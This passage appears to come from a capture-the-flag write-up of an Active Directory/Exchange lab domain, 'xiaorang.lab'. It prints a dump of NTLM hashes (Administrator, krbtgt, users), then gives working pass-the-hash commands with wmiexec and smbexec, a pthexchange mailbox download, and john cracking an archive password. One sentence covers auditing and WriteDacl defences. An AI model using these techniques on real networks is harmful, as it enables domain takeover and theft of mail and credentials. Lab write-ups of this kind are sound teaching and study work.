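Both events only appear when the SACL on the domain object audits these operations (the "Audit Directory Service Access" and "Audit Directory Service Changes" subcategories), so the check is worthless until that auditing is enabled; the other control the chain depends on is the one BloodHound surfaced, the Exchange server's WriteDacl on the domain object, which the Exchange "split permissions" model removes.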
xiaorang.lab\Administrator:500:aad3b435b51404eeaad3b435b51404ee:7acbc09a6c0efd81bfa7d5a1d4238beb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b8fa79a52e918cb0cbcd1c0ede492647:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\$431000-7AGO1IPPEUGJ:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_46bc0bcd781047eba:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_2554056e362e45ba9:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_ae8e35b0ca3e41718:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_341e33a8ba4d46c19:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_3d52038e2394452f8:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_2ddd7a0d26c84e7cb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_015b052ab8324b3fa:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_9bd6f16aa25343e68:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_68af2c4169b54d459:1133:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\HealthMailbox8446c5b:1135:aad3b435b51404eeaad3b435b51404ee:6a049c17ae6f214d0ce0bb958be94c7a:::
xiaorang.lab\HealthMailbox0d5918e:1136:aad3b435b51404eeaad3b435b51404ee:33cd42e4c654333ef6118bea55f376ba:::
xiaorang.lab\HealthMailboxeda7a84:1137:aad3b435b51404eeaad3b435b51404ee:1e89e23e265bb7b54dc87938b1b1a131:::
xiaorang.lab\HealthMailbox33b01cf:1138:aad3b435b51404eeaad3b435b51404ee:0eff3de35019c2ee10b68f48941ac50d:::
xiaorang.lab\HealthMailbox9570292:1139:aad3b435b51404eeaad3b435b51404ee:e434c7db0f0a09de83f3d7df25ec2d2f:::
xiaorang.lab\HealthMailbox3479a75:1140:aad3b435b51404eeaad3b435b51404ee:c43965ecaa92be22c918e2604e7fbea0:::
xiaorang.lab\HealthMailbox2d45c5b:1141:aad3b435b51404eeaad3b435b51404ee:4822b67394d6d93980f8e681c452be21:::
xiaorang.lab\HealthMailboxec2d542:1142:aad3b435b51404eeaad3b435b51404ee:147734fa059848c67553dc663782e899:::
xiaorang.lab\HealthMailboxf5f7dbd:1143:aad3b435b51404eeaad3b435b51404ee:e7e4f69b43b92fb37d8e9b20848e6b66:::
xiaorang.lab\HealthMailbox67dc103:1144:aad3b435b51404eeaad3b435b51404ee:4fe68d094e3e797cfc4097e5cca772eb:::
xiaorang.lab\HealthMailbox320fc73:1145:aad3b435b51404eeaad3b435b51404ee:0c3d5e9fa0b8e7a830fcf5acaebe2102:::
xiaorang.lab\Lumia:1146:aad3b435b51404eeaad3b435b51404ee:862976f8b23c13529c2fb1428e710296:::
Zhangtong:1147:aad3b435b51404eeaad3b435b51404ee:22c7f81993e96ac83ac2f3f1903de8b4:::
XIAORANG-WIN16$:1000:aad3b435b51404eeaad3b435b51404ee:b9df9852037915b5f26114769ace114a:::
XIAORANG-EXC01$:1103:aad3b435b51404eeaad3b435b51404ee:b0d89dce8c89f4a43758961e8f782174:::
XIAORANG-PC$:1104:aad3b435b51404eeaad3b435b51404ee:74d63202f94c220e09056568feafa894:::
[*] Cleaning up...

Lateral movement

Use the administrator's hash to get an administrator shell:

proxychains4 python3 wmiexec.py xiaorang.lab/Administrator@172.22.3.2 -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb -dc-ip 172.22.3.2 -codec gbk


View the flag under the domain admin

flag03

Using the administrator hash with smbexec to move laterally to the .26 machine, no flag was found.
The dumped hashes also showed the username lumia; one could use the domain admin to create a local administrator and change lumia's password, then log in to the desktop and mailbox to look for information.
Here I directly used the tool pthexchange to download lumia's attachments and mail.

proxychains python3 pthexchange.py --target https://172.22.3.9/ --username Lumia --password '00000000000000000000000000000000:862976f8b23c13529c2fb1428e710296' --action Download

An encrypted archive was found.

Opening the other files shows that the archive password is a phone number.

Conveniently there is a file containing a phone number.
Use john to crack the archive; the archive password is 18763918468.

zip2john secret.zip >zip.txt

john --wordlist=1.txt zip.txt

Extract the file to get the flag.

Reference links

https://mp.weixin.qq.com/s/Fvo1B5UbiqbENEe9uYrzJA
https://www.kinsomnia.cn/index.php/2024/03/25/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83-exchange/